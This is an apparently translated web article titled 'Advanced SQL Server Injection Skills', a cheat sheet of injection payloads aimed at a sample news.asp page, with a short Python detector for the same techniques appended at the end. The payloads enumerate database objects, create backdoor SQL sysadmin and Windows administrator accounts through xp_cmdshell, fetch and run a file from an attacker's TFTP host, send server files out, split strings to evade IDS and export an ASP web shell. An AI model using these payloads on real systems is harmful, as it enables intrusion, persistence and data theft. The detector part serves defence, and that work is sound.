Advanced SQL Server Injection Skills from the Guilin Veteran

Source: Internet
Author: User
Tags: sql server injection
The veteran's advanced SQL Server injection skills, accumulated over the years, are presented here for the friends who support the veteran:

Preface:
Basic injection methods are not described in detail here.
If you cannot follow along, read the basic injection articles on this site first.
To make better use of injection, we also suggest reading the SQL syntax articles on this site.

[Retrieve all database names]
select name from master.dbo.sysdatabases where dbid = 7 -- user databases have dbid values of 7 and above; step dbid upward to list them one by one

[Retrieve a table name] [update a field value to the table name, then read that field back to obtain the table name]
select top 1 name from dbname.dbo.sysobjects where xtype = 'U' and status > 0 and name not in ('known_table') -- add each name already found to the not in list to get the next one

[Obtain the field names of a table] [update a field value to the field name, then read that field back to obtain the field name]
select top 1 col_name(object_id('table_to_query'), 1) [where condition] -- the second argument is the column ordinal: 1, 2, 3, ...

Create a database administrator account and a system administrator account through a SQL Server injection vulnerability [the current login must be a member of the sysadmin role]

news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- // add the database login test with the password test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- // use this to change the password of test to 123456
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- // add test to the sysadmin role; members of this role can perform any operation
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- // add the system user test with the password test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- // make the system user test an administrator

In this way you have left a test administrator account in both the database and the operating system.

The following shows how to make the server download file.exe and then run it [prerequisite: your own computer must run a TFTP server with port 69 open]

id=2;exec master.dbo.xp_cmdshell 'tftp -i your_IP get file.exe';--

Then run the file:
id=2;exec master.dbo.xp_cmdshell 'file.exe';--

Download the server's file2.doc to your local TFTP server [the file must exist]:

id=2;exec master.dbo.xp_cmdshell 'tftp -i your_IP put file2.doc';--

Bypassing IDS detection [using variables]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:/'

Newly added:

Create a table with a single image-type field, write ASP content into it, then export the database as a file:
backup database dbname to disk='d:/web/db.asp';

Trigger an error to obtain the OS and database version number:
id=2 and 1<>(select @@version);--
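As an added defender-side example (not part of the original article), the following Python scans request query strings for the techniques this page describes, including the variable-based IDS bypass: it URL-decodes each request and merges adjacent string literals so that 'xp_'+'cm'+'dshell' is seen as xp_cmdshell before matching. The sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the techniques on this page: login/role procedures,
# xp_cmdshell, web-shell export via BACKUP DATABASE and version probing.
INDICATORS = (
    "xp_cmdshell", "sp_addlogin", "sp_password", "sp_addsrvrolemember",
    "backup database", "@@version",
)

# 'xp_' + 'cm' + 'dshell'  ->  'xp_cmdshell'  (undoes the literal-splitting evasion)
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# exec @a ...  (procedure name held in a variable instead of written out)
_EXEC_VAR = re.compile(r"\bexec(?:ute)?\s+@\w+")


def normalize(query_string: str) -> str:
    """URL-decode, lower-case, fold whitespace and merge adjacent string literals."""
    text = unquote_plus(query_string).lower()
    text = re.sub(r"\s+", " ", text)
    prev = None
    while prev != text:  # each pass merges one adjacent pair per position
        prev = text
        text = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text


def findings(query_string: str) -> list[str]:
    """Return the indicators present in one request's query string."""
    text = normalize(query_string)
    hits = [ind for ind in INDICATORS if ind in text]
    if _EXEC_VAR.search(text):
        hits.append("exec @variable")
    return hits


# Constructed sample requests (not real traffic). A literal '+' in a URL decodes
# to a space, so the concatenation operator appears as %2B in the third line.
SAMPLE_REQUESTS = [
    "news.asp?id=2",
    "news.asp?id=2;exec%20master.dbo.sp_addlogin%20test,test;--",
    "news.asp?id=2;declare%20@a%20sysname%20set%20@a=%27xp_%27%2B%27cm%27"
    "%2B%27dshell%27%20exec%20@a%20%27dir%20c:/%27;--",
    "news.asp?id=2%20and%201%3C%3E(select%20@@version);--",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(findings(req) or "clean", "<-", unquote_plus(req))
```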
